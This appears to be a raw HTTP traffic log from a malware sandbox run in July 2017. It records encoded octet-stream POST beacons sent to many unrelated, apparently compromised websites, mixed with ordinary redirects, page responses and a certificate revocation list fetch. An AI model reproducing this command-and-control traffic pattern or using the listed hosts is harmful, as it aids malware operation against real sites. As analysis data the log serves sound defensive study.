g.com/..Content-Length: 277..Keep-Alive: timeout=5, max=100..Connectio
n: Keep-Alive..Content-Type: text/html; charset=iso-8859-1..<!DOCTY
PE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>
;.<title>302 Found</title>.</head><body>.<h
1>Found</h1>.<p>The document has moved <a href="http
s://VVV.vanguardpkg.com/">here</a>.</p>.<hr>.<
address>Apache Server at vanguardpkg.com Port 80</address>.&l
t;/body></html>...


POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 488
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: msasys.com
Connection: Keep-Alive
Cache-Control: no-cache

qvkDGUQWxpATAGXfXywBsBdO9QR8/FqnuO9nUxkcmZHT2BCsmox2t0Wn3IC6cc/p88I /n/4/tZssSlWOHyZ0 tEZzt2B/2L8rreppk4jEIz9Z2AqtsqxlUjowjicl5Z/Hx/PlnSmmhxs9sPnqcnDdbGi3w3fI3l2N0Yln6uvzKV6TvHncypUJ4UJDNs64eMNqyxqVVb2qAXZQP8GeqSLLHrGXNshByXvsll5auIqht67IAJHBtPwlu50ozlV71/LDosBW3CLCmrBWevm3qp27mA58J3ornddRipN7rBkNHauPgGAQoeLdUmlg/xKH7RHAFhXM98izZQO nSpAOUiWsjk66TLeytVYlsX7ybnNNOfNLp2HItTqIVSLOvqzGsxNbkharOFS hWr404tC7cFtp y/jBaCtYsesKlnCV1wEZdUKZx/HW/mKpJxIlr90Y8sKMX45ULOZooSYCcnjI2SmKztWnuGOS/FSDnc=
HTTP/1.1 301 Moved Permanently
Cache-Control: max-age=900
Content-Type: text/html
Location: hXXp://VVV.msasys.com
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Sat, 01 Jul 2017 11:17:37 GMT
Content-Length: 0
Age: 0
Connection: keep-alive
HTTP/1.1 301 Moved Permanently..Cache-Control: max-age=900..Content-Ty
pe: text/html..Location: hXXp://VVV.msasys.com..Server: Microsoft-IIS/
7.5..X-AspNet-Version: 4.0.30319..X-Powered-By: ASP.NET..Date: Sat, 01
Jul 2017 11:17:37 GMT..Content-Length: 0..Age: 0..Connection: keep-al
ive..


GET / HTTP/1.1
Accept: */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: VVV.shipeliteexpress.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 301 Moved Permanently
Content-Type: text/html; charset=UTF-8
Location: hXXps://VVV.shipeliteexpress.com/
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
Date: Sat, 01 Jul 2017 11:16:56 GMT
Content-Length: 156
<head><title>Document Moved</title></head>.<
;body><h1>Object Moved</h1>This document may be found &
lt;a HREF="hXXps://VVV.shipeliteexpress.com/">here</a></bo
dy>HTTP/1.1 301 Moved Permanently..Content-Type: text/html; charset
=UTF-8..Location: hXXps://VVV.shipeliteexpress.com/..Server: Microsoft
-IIS/8.5..X-Powered-By: ASP.NET..Date: Sat, 01 Jul 2017 11:16:56 GMT..
Content-Length: 156..<head><title>Document Moved</title
></head>.<body><h1>Object Moved</h1>This do
cument may be found <a HREF="hXXps://VVV.shipeliteexpress.com/">
here</a></body>..


POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 528
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: justconnect.co.za
Connection: Keep-Alive
Cache-Control: no-cache

MpN3MldVonFPqxDQRvIsBaDBLR6NYG0be44M6LZtOXGITtos3i2hqSuHqqJtyKNqKIkTEjTwTaj twxFTWp I1eVq0OewXe9SQ8Nvye6k6DBV3BdykMo qs1uJKDfjot2t wpNWXsgmrztornTidV6EEioaHHpDPQsoMhwqCibJbCZ6IRXYqtrpWZHuKFPSXid1sj3n2k41FG51d36LpZsNPEMa/auEteuOgh4qqjbC6jClKO3S7rYTGzz/8TYvZL7kn7d19knGn has3kz433emImZSP5fw6rFHe3lVI9 V3JTtpQK3T/orIwrlO7x2O98dezDAgVSRGfG8TcmtWiKkYT1cKSPEZZsAeTWL0RmRrmRZ9fqEP7ubnbBhFiSsbEnphBfXYYoxpesASF71eFtFE xqW CLCBuseWma7FVl917uD19GP2FyRAz2vaHwUhsVOW3z/3P6 qjg9YmdLiATdQQ5/4Cy/IwnNC3eprBTkZ2d6IRMCNp6LX/RDuwvUMgMmEcLvqgxaA==
HTTP/1.1 301 Moved Permanently
Server: nginx/1.1.19
Date: Sat, 01 Jul 2017 11:17:01 GMT
Content-Type: text/html
Content-Length: 185
Connection: keep-alive
Location: hXXp://juizi.com
<html>..<head><title>301 Moved Permanently</title
></head>..<body bgcolor="white">..<center><h1&
gt;301 Moved Permanently</h1></center>..<hr><cent
er>nginx/1.1.19</center>..</body>..</html>..HTTP/
1.1 301 Moved Permanently..Server: nginx/1.1.19..Date: Sat, 01 Jul 201
7 11:17:01 GMT..Content-Type: text/html..Content-Length: 185..Connecti
on: keep-alive..Location: hXXp://juizi.com..<html>..<head>
<title>301 Moved Permanently</title></head>..<bod
y bgcolor="white">..<center><h1>301 Moved Permanently&l
t;/h1></center>..<hr><center>nginx/1.1.19</cen
ter>..</body>..</html>....


POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 484
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: link-list-uk.com
Connection: Keep-Alive
Cache-Control: no-cache

AGKFv0LPXXIld9q2NcU4qcWxKcJSRFFEluFSYJI6dVfI0vZWP/WnmfdDZOMUIhIOLi8YkLcUeRSp9foY/BhU Ngw6e9oRZ7MOnnREtF19elOdqTz0q6 1B8ThCfZHBiE2suWr9jUQS7/E U9 Jso2BjbvDczBo9GLl3BZz25A329maBw8gf 7F/0SCEOfuNymPyMf6C T5fW/53iLqT4wfo9q6ha4uuQv9p4pCEm9c3Jqyt9xHFj2HgcbVf6FtX04mrHEpV6TkrzUP9DtRgC1DChkt0tJcAVTXITPgVDymJK7VT0Y5isIscNLuGqgBW2GmWaF pmSEBHlV1lO4j5bDJ5UmLM4ZjGaP65nrI37NBvdhyAoDeAIaaIcNNpKFa2wzVGQ3LU2iKLgKAQXfbPK3Tbj7drre3aD7qvzYq  lg58JCB3OmdcumGrRJrSvaSOac2FomomJ0OyL3GE7xQHfYBpe/NMQEQljw=
HTTP/1.1 200 OK
Date: Sat, 01 Jul 2017 11:17:00 GMT
Server: Apache
Last-Modified: Tue, 20 Oct 2015 22:57:55 GMT
Accept-Ranges: bytes
Content-Length: 274
Connection: close
Content-Type: text/html
<div align="center">.   <table border="0" width="100%" cellsp
acing="0" cellpadding="0">. <tr>. <td>.
<p align="center">. <img border="0" src="http:/
/VVV.tynewd.co.uk/holdingpage.jpg" width="800" height="500"></td
>. </tr>. </table>.</div>...


POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 464
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: genmar.gen.tr
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: __cfduid=dec2cd68baee90387d3b90d9ad5a9c8c21498907821

ozcVtnsCrn8R4mMSEhVFS2QC/LGBXkC43xPofzl5DClFu2QCtzznnW0NBAfK1HLvnpF6Itm0ptM9ug7awmRoExyrCcEM/h7dvpr1uxF6EMw00 i50XPRZd1Eb6IYzR3EiCq8uOrE9CYHdvjAm7rhOv/ZYUtcLg661EEUpv4ShTNKnfSCFB xpTYywx 6Kw05gp3rNWDsgJNR7mGwSnMa23RMc7NfD63xVvSBH3IG9cxZRUvaKH hiCzn3jld6N5Vf14FsSAIc282QpwPWe2dqHG6H3AzmMIfwKSXe BEHKPl29YRWNMJIsBmMNHLY/i5lm4z1mH7qihiHlYgThrUmafL1dimE3MQOL9q9GDuX58hJHFPBpXCrhk GOk6JwjBxdxLhfPEF5lulC20gAAMn6ke2j86V/o7V1BwK/sK1UcCdTehJ6pPTNGkclUKRTRJIlHqTuP09PJEIw==
HTTP/1.1 503 Service Temporarily Unavailable
Date: Sat, 01 Jul 2017 11:17:17 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Frame-Options: SAMEORIGIN
Cache-Control: no-cache
Server: cloudflare-nginx
CF-RAY: 3778f540b182844e-KBP
105c..<!DOCTYPE HTML>.<html lang="en-US">.<head>.  &
lt;meta charset="UTF-8" />. <meta http-equiv="Content-Type" con
tent="text/html; charset=UTF-8" />. <meta http-equiv="X-UA-Comp
atible" content="IE=Edge,chrome=1" />. <meta name="robots" cont
ent="noindex, nofollow" />. <meta name="viewport" content="widt
h=device-width, initial-scale=1, maximum-scale=1" />. <title>
;Just a moment...</title>. <style type="text/css">. ht
ml, body {width: 100%; height: 100%; margin: 0; padding: 0;}. body
{background-color: #ffffff; font-family: Helvetica, Arial, sans-serif;
font-size: 100%;}. h1 {font-size: 1.5em; color: #404040; text-alig
n: center;}. p {font-size: 1em; color: #404040; text-align: center;
margin: 10px 0 0 0;}. #spinner {margin: 0 auto 30px auto; display:
block;}. .attribution {margin-top: 20px;}. @-webkit-keyframes b
ubbles { 33%: { -webkit-transform: translateY(10px); transform: transl
ateY(10px); } 66% { -webkit-transform: translateY(-10px); transform: t
ranslateY(-10px); } 100% { -webkit-transform: translateY(0); transform
: translateY(0); } }. @keyframes bubbles { 33%: { -webkit-transform
: translateY(10px); transform: translateY(10px); } 66% { -webkit-trans
form: translateY(-10px); transform: translateY(-10px); } 100% { -webki
t-transform: translateY(0); transform: translateY(0); } }. .bubbles
{ background-color: #404040; width:15px; height: 15px; margin:2px; bo
rder-radius:100%; -webkit-animation:bubbles 0.6s 0.07s infinite ea

<<< skipped >>>

GET /gdig2s1-87.crl HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: crl.godaddy.com


HTTP/1.1 200 OK
Date: Sat, 01 Jul 2017 11:19:05 GMT
Server: Apache
Last-Modified: Fri, 30 Jun 2017 01:46:56 GMT
ETag: "262988-55323979a8400"
Accept-Ranges: bytes
Content-Length: 2501000
Cache-Control: max-age=259200
Expires: Tue, 04 Jul 2017 11:19:05 GMT
P3P: CP="IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA"
Connection: close
Content-Type: application/pkix-crl
0.&).0.&(j...0...*.H........0..1.0...U....US1.0...U....Arizona1.0...U.
...Scottsdale1.0...U....GoDaddy.com, Inc.1-0 ..U...$hXXp://certs.godad
dy.com/repository/1301..U...*Go Daddy Secure Certificate Authority - G
2..170630014433Z..170707014433Z0.&&.0'..p1.`~08...150131003046Z0.0...U
.......0'..C..b...A..150301200109Z0.0...U.......0(.............1504022
32125Z0.0...U.......0(....tp.G..>..150515074101Z0.0...U.......0&..'
.....F..150119005103Z0.0...U.......0&....,..$...140712004035Z0.0...U..
.....0&..K<"T..~..141003214038Z0.0...U.......0'..M.\XN.....17040303
1754Z0.0...U.......0(....c.P.(.9..160315004115Z0.0...U.......0&..'{...
....170209184009Z0.0...U.......0%..l.W.....140814195035Z0.0...U.......
0&.. t..M.B..141019151043Z0.0...U.......0(....F....sU..150510230101Z0.
0...U.......0&..'...'....160602145056Z0.0...U.......0&...{.kJ....14112
4181040Z0.0...U.......0&..(..P.K...160212185048Z0.0...U.......0&..O.c.
..4..150604074133Z0.0...U.......0'..`e...00...150730034103Z0.0...U....
...0'....@.).....160501173100Z0.0...U.......0(....94..q/...16101123310
0Z0.0...U.......0&......~.g..160204175048Z0.0...U.......0(....p.M.F_..
.150401004525Z0.0...U.......0&.. P.......141215041035Z0.0...U.......0'
............150507200901Z0.0...U.......0(....S....D...150502193102Z0.0
...U.......0'.. pu1..$...161007000100Z0.0...U.......0(......c.Ig...151
206213114Z0.0...U.......0(....\..|.(...150413182126Z0.0...U.......0(..
...N1......150628175130Z0.0...U.......0%..n.'.L...141123010040Z0.0...U
.......0&...u)..c...141016180037Z0.0...U.......0(....g'..F....1501

<<< skipped >>>

POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 444
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: slcago.org
Connection: Keep-Alive
Cache-Control: no-cache

FBVINRxWSV8M9e3sR3oztK8TzOM0RdXWEPlyf8Ic006bDGH6oSUQQK R6LvLDTR6Nvfu0g518/xEOOVhNYR5k/h8TdEqzKc9RKJfoiQQrPwZmhW/tx8GAAmfSJ abnlKNFznnpFCvpSlJBmrwYxCy 08cWcrao6lg2FRBl8muSOfH DnvrKiYHFeE0dsWL71bmla1xx VG2gVv8vayUJQWAfykTPPjT7EOwbrknsE7Ib9MIePcHUwBxX4RzgL VIKybFU0Uvb1GxhUYtl8QaWICsZsGykOIaGet75uQIo8upR93k4jKERK8yJU8gYpdYaL Jly975NcF3GuN2N6 KGpbAVvxmq4hlxRoejCzlRvQsJnZcrDOQTxxzRzvP44qEgamQERrnFHR49nLxXG56L1szt4dHW3Q7F2WexTR69wpJx11rvbiPg1NJ6k=
HTTP/1.1 200 OK
Date: Sat, 01 Jul 2017 11:16:40 GMT
Server: Apache/2.4.18 (Ubuntu)
Link: <hXXp://slcago.org/wp-json/>; rel="hXXps://api.w.org/"
Link: <hXXp://slcago.org/>; rel=shortlink
Vary: Accept-Encoding
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
2030..<!DOCTYPE html>.<html lang="en-US">.    <head>
. <meta charset="UTF-8">. <meta http-equiv="X-U
A-Compatible" content="IE=edge">. <meta name="viewport" c
ontent="width=device-width, initial-scale=1">. <link rel=
"pingback" href="hXXp://slcago.org/xmlrpc.php">. <!--[if
lt IE 9]>. <script src="hXXps://oss.maxcdn.com/html5shi
v/3.7.2/html5shiv.min.js"></script>. <script src=
"hXXps://oss.maxcdn.com/respond/1.4.2/respond.min.js"></script&g
t;. <![endif]-->. <title>Salt Lake Chapter &
#8211; American Guild of Organists</title>.<link rel='dns-pre
fetch' href='//maps.googleapis.com' />.<link rel='dns-prefetch'
href='//fonts.googleapis.com' />.<link rel='dns-prefetch' href='
//s.w.org' />...<script type="text/javascript">....window._wp
emojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/2.
2.1\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/
emoji\/2.2.1\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\
/slcago.org\/wp-includes\/js\/wp-emoji-release.min.js?ver=4.7.5"}};...
.!function(a,b,c){function d(a){var b,c,d,e,f=String.fromCharCode;if(!
k||!k.fillText)return!1;switch(k.clearRect(0,0,j.width,j.height),k.tex
tBaseline="top",k.font="600 32px Arial",a){case"flag":return k.fillTex
t(f(55356,56826,55356,56819),0,0),!(j.toDataURL().length<3e3)&&(k.c
learRect(0,0,j.width,j.height),k.fillText(f(55356,57331,65039,8205

<<< skipped >>>

POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 516
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: business-edge.com
Connection: Keep-Alive
Cache-Control: no-cache

uAu352SyOnUb32Fa/9pB/zffC8Uc23KS2D103XATe0/zrPcQIKxwnxFj6oRKhmfQXiiPfqND4341fUFXsMexpd/hk5Hj58ZhFWjQ0zFUo2ye1f/zKQ4l8tBhtNi2JU7tYYQBVHCHX5l1QybzILsCJWRjNF1d KQLo/IvdbpX57EHiBe3jMuSiMY/mD 1PG DUSzcYG23WVGRpAlSCIwH7WCP6tKZUQ1OREJIwrcPaQjXQe4v8TImdxJwBT4V2NX3b9vL5O2sZAQR7ggEGC  bD5LBdExzl4bbRzVRjYPP6yZLMIpKqYQpHFQ9Y4VRXObYSbgv30V5k ojJFNgDX26YWJEE0gy56PKxBnl0cIdN62tQrySoQpB/pKGr/6TwI4PAtBJYTmfS5aTMtWFg51FcLXdREas9m4n0EbwFuzLnR3MRdciSMU8pfkDbAxLmxy3z4U2Uc0W BWUa8u9dqZL iE1ibyezgSiEDwDXoQ2AHDQgGsl5qqWPvv3j1588Wf04o=
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 23776
Content-Type: text/html
Server: Microsoft-IIS/8.5
Set-Cookie: ASPSESSIONIDCATARQSD=IOJMKPIDCFAIJGCDPFECDLIA; path=/
Date: Sat, 01 Jul 2017 11:17:05 GMT
..<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "h
ttp://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">..<html
xmlns="hXXp://VVV.w3.org/1999/xhtml">..<head>..<link rel="
openid2.provider" href="hXXps://openid.stackexchange.com/openid/provid
er">..<link rel="openid2.local_id" href="hXXps://openid.stackexc
hange.com/user/15bc7831-c6eb-4379-8f6f-0eeef687c035"> ..<meta ht
tp-equiv="Content-Type" content="text/html; charset=utf-8" />..<
title>Legal Website and Law Brochure Design firm with development o
ffices in Connecticut, New York, Boston, and New Jersey.</title>
..<meta name="description" content=">Legal Website and Law Broch
ure Design firm with offices in Hartford, New York city, Boston, and N
ew Jersey - law firm website designer since 1997." />..<link hre
f="css/style2012.css" rel="stylesheet" type="text/css" />..<meta
name="verification" content="50b8d4bffc3aff11a1499bf73756a796" />.
.<!-- Home Page Banner Slider Script set start -->..<script t
ype="text/javascript" src="js/jquery-1.3.2.min.js"></script>.
.<script type="text/javascript" src="js/jCubes.js"></script&g
t;..<script type="text/javascript" src="js/jToggleValue.js"><
/script>..<script type="text/javascript" src="js/jquery-backgrou
nd-position-animation.js"></script>..<script type="text/Ja
vaScript">..<!--..function MM_swapImgRestore() { //v3.0.. var i
,x,a=document.MM_sr; for(i=0;a&&i<a.length&&(x=a[i])&&x.oSrc;i

<<< skipped >>>

POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 524
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: tessera.co.jp
Connection: Keep-Alive
Cache-Control: no-cache

4tGSKVThnnR6GGs8L9x7d6cbjTPMDAeUyBv9im0WtFJ8QpnELGX3sSA4mFLBcsi0DPB9lVQNBn8eqd6CZW6tkEU2RpCZ6mD82fgtFIWezHUldln6cp1NpLEP3K5 gFXA2JTzlvRijaUEPUf0WSPbQUu/oE9SbRBNLQygjlgMTdpgR0SCEDIV6t FQPKg/o1 ir9qCKYCIFqgYkTqJXLCx7rkqtwj8SHHBk4CyHxC7X3ihPKtpHrS7zMGTA0dZtI6ehNN8SID93M67zW6cHjWiYmp1GtMzSM3NQUDdGz7qO6bF8hidUr5qaR84yOFgACkGpzT4Uy6/ve9iZJTXGlJETURFIlICFUUoDV10vb9f2mX71SyvrM2hNYLpTJbLY fSyg2ko3tjjecbR8OFDmi8lf8EIt7iHsDk wMI8lahxjrB10tC2e0u 2wQvxFSx2V1cj7YwSLvZzi/ZSG0cconjzwFe1JOQG88b9W/nryrxxllx2fcSWlJHgC8wxvunwbK/2rlimKz7M=
HTTP/1.1 403 Forbidden
Date: Sat, 01 Jul 2017 11:17:05 GMT
Server: Apache
Content-Length: 202
Connection: close
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html>&
lt;head>.<title>403 Forbidden</title>.</head><
body>.<h1>Forbidden</h1>.<p>You don't have permis
sion to access /.on this server.</p>.</body></html>.
..


GET / HTTP/1.1
Accept: */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: VVV.sztartufi.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 301 Moved Permanently
Server: nginx
Date: Sat, 01 Jul 2017 11:16:37 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=1cufr64moamqjsdm27m68q43s7; path=/
location: hXXp://VVV.sztartufi.com/en/
Vary: Accept-Encoding
X-Powered-By: PleskLin
....



GET /en/ HTTP/1.1

Accept: */*
Accept-Language: en-us
Cookie: PHPSESSID=1cufr64moamqjsdm27m68q43s7
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: VVV.sztartufi.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx
Date: Sat, 01 Jul 2017 11:16:37 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
X-Powered-By: PleskLin
1ed4..<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN
" "hXXp://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<ht
ml xmlns="hXXp://VVV.w3.org/1999/xhtml"><!-- InstanceBegin templ
ate="/Templates/header_en.dwt.php" codeOutsideHTMLIsLocked="false" --&
gt;.<head>.<meta http-equiv="Content-Type" content="text/html
; charset=iso-8859-1" />.<!-- InstanceBeginEditable name="doctit
le" -->.<title>Fresh Truffles and typical truffle products -
S.Z. Tartufi</title>.<meta name="description" content="" />
;.<meta name="keywords" content="" />.<!-- InstanceEndEditabl
e -->..<meta name="author" content="VVV.internetedintorni.it" /&
gt;.<meta name="copyright" content="(c)2012 internetedintorni" />
;.<link href="hXXps://fonts.googleapis.com/css?family=Noticia Text:
700,400|Open Sans:400,600" rel="stylesheet" type="text/css" />.<
link href="/css/style.css" rel="stylesheet" type="text/css" />..<
;!-- Per Browser -->.<link href="/favicon.ico" rel="shortcut ico
n" />.<!-- Per iPad Retina -->.<link rel="apple-touch-icon
-precomposed" sizes="144x144" href="/apple-touch-icon-144x144-precompo
sed.png" />.<!-- Per iPhone Retina -->.<link rel="apple-to
uch-icon-precomposed" sizes="114x114" href="/apple-touch-icon-114x114-
precomposed.png" />.<!-- Per iPad -->.<link rel="apple-tou
ch-icon-precomposed" sizes="72x72" href="/apple-touch-icon-72x72-preco
mposed.png" />.<!-- Per iPhone e android -->.<link rel

<<< skipped >>>

POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 428
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: tvndra.net
Connection: Keep-Alive
Cache-Control: no-cache

i5zMwlLb72tPL8MPBcIBtFVoaROiuVqbpi59yBVJFcvQ7sYiBUe9HhVs05buVbXglrG8YTOJXrwfvT/47hdhI/570a0rpchL9Tk2/HMm/u9vfjvEpk3XDBAwXR F6NC2cxP3TpgesDlQgbbiZbTeqc1qeCzw2QMlruCLkkW L3ui5ncsoAkI76MRGtrxT906JssHNubXi0kX4Rv9rrM9BVNN4EVOnB8UUNwkJ/f6pgbiN 5MIarI8IZn48RlY73mlqlWZCBb4k8jB U9MZ NOf8NG19z3cAM8C x/ikTIXdIw HD/x/t4ZBozZG3W3LUcLPJigIuUOz7YRiHKJ0lZm5P7JAFry8OnqJsgH6hhpUufnU37i8lKU6P2hK2Nm4hwlTewSenOpOYdkVxbn2EZclghhIJ0 kSTHcCyO/qHPHO
HTTP/1.1 410 Gone
Date: Sat, 01 Jul 2017 11:16:54 GMT
Server: Apache/2
Content-Length: 471
Keep-Alive: timeout=1, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html>&
lt;head>.<title>410 Gone</title>.</head><body&
gt;.<h1>Gone</h1>.<p>The requested resource<br /&
gt;/<br />.is no longer available on this server and there is no
forwarding address..Please remove all references to this resource.<
;/p>.<p>Additionally, a 410 Gone.error was encountered while
trying to use an ErrorDocument to handle the request.</p>.<hr
>.<address>Apache/2 Server at tvndra.net Port 80</address&
gt;.</body></html>.HTTP/1.1 410 Gone..Date: Sat, 01 Jul 20
17 11:16:54 GMT..Server: Apache/2..Content-Length: 471..Keep-Alive: ti
meout=1, max=100..Connection: Keep-Alive..Content-Type: text/html; cha
rset=iso-8859-1..<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"&
gt;.<html><head>.<title>410 Gone</title>.</
head><body>.<h1>Gone</h1>.<p>The requested
resource<br />/<br />.is no longer available on this serve
r and there is no forwarding address..Please remove all references to
this resource.</p>.<p>Additionally, a 410 Gone.error was e
ncountered while trying to use an ErrorDocument to handle the request.
</p>.<hr>.<address>Apache/2 Server at tvndra.net Por
t 80</address>.</body></html>...

<<< skipped >>>

POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 532
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: precisionsolutionsky.com
Connection: Keep-Alive
Cache-Control: no-cache

QJpdrAMKd2SQZbJbCqfCvizbJtepgFTZ5xfZ0rlGGRNXDjRDMjI8ufRLf3TjC6aeOKs f2W0kdEtfQnGS7FMOJm766P1ksbgmmvMMWj3ERggesrfCBPBxKZwLEUGnj6DZXt/RKVBPYwSDH/4t19nSgyWyhmCcqUz/M8KUJLW11SrdDULLJB3wxHfLkLTLNeZn1sCTjE0D WsLRv0sF3jsx/UPcbHJBRWSogtfnLfBbzvLCjsl/qdmF4rxyrEk/hY4OpGEgzk7rbSm1qaVEgvEpYtONO0m4Qm/rj8RsfOwRMoAF9JXg1kKiP8sVmhtcxBi5wrPqSw n0S2Mss3iogHu78hSD/61P7HyZQWvkn1mMjvq0pnppkanynd9UpQvW4K7Yt31B7P6P845dRMpp0YQM0UKU/PUiBXvlxr//Amb6B6sc6mpO491dQN avoHiOG4h5vhlV1PWTjIe6CreMmkwXedEu47vq7dFoLf9p2ed1/J1RHfZ1sW886mPPeglbn0ipxJC7LZIIhhVT2f4=
HTTP/1.1 403 Forbidden
Server: nginx
Date: Sat, 01 Jul 2017 11:16:45 GMT
Content-Type: text/html
Content-Length: 564
Connection: keep-alive
<html>..<head><title>403 Forbidden</title><
/head>..<body bgcolor="white">..<center><h1>403 F
orbidden</h1></center>..<hr><center>nginx</
center>..</body>..</html>..<!-- a padding to disable
MSIE and Chrome friendly error page -->..<!-- a padding to disa
ble MSIE and Chrome friendly error page -->..<!-- a padding to d
isable MSIE and Chrome friendly error page -->..<!-- a padding t
o disable MSIE and Chrome friendly error page -->..<!-- a paddin
g to disable MSIE and Chrome friendly error page -->..<!-- a pad
ding to disable MSIE and Chrome friendly error page -->..HTTP/1.1 4
03 Forbidden..Server: nginx..Date: Sat, 01 Jul 2017 11:16:45 GMT..Cont
ent-Type: text/html..Content-Length: 564..Connection: keep-alive..<
html>..<head><title>403 Forbidden</title></hea
d>..<body bgcolor="white">..<center><h1>403 Forbi
dden</h1></center>..<hr><center>nginx</cent
er>..</body>..</html>..<!-- a padding to disable MSI
E and Chrome friendly error page -->..<!-- a padding to disable
MSIE and Chrome friendly error page -->..<!-- a padding to disab
le MSIE and Chrome friendly error page -->..<!-- a padding to di
sable MSIE and Chrome friendly error page -->..<!-- a padding to
disable MSIE and Chrome friendly error page -->..<!-- a padding
to disable MSIE and Chrome friendly error page -->....

<<< skipped >>>

GET / HTTP/1.1
Accept: */*
Accept-Language: en-us
Cookie: PHPSESSID=j7kgovsp5k90k74s1jf0lua073
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: VVV.itgsolutions.nl
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 301 Moved Permanently
Date: Sat, 01 Jul 2017 11:17:29 GMT
Server: Apache
Location: hXXp://itgsolutions.nl/
Content-Length: 231
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html>&
lt;head>.<title>301 Moved Permanently</title>.</head
><body>.<h1>Moved Permanently</h1>.<p>The d
ocument has moved <a href="hXXp://itgsolutions.nl/">here</a&g
t;.</p>.</body></html>.HTTP/1.1 301 Moved Permanentl
y..Date: Sat, 01 Jul 2017 11:17:29 GMT..Server: Apache..Location: http
://itgsolutions.nl/..Content-Length: 231..Keep-Alive: timeout=5, max=1
00..Connection: Keep-Alive..Content-Type: text/html; charset=iso-8859-
1..<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html&g
t;<head>.<title>301 Moved Permanently</title>.</h
ead><body>.<h1>Moved Permanently</h1>.<p>Th
e document has moved <a href="hXXp://itgsolutions.nl/">here</
a>.</p>.</body></html>...


POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 492
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: stormwildlifeart.com
Connection: Keep-Alive
Cache-Control: no-cache

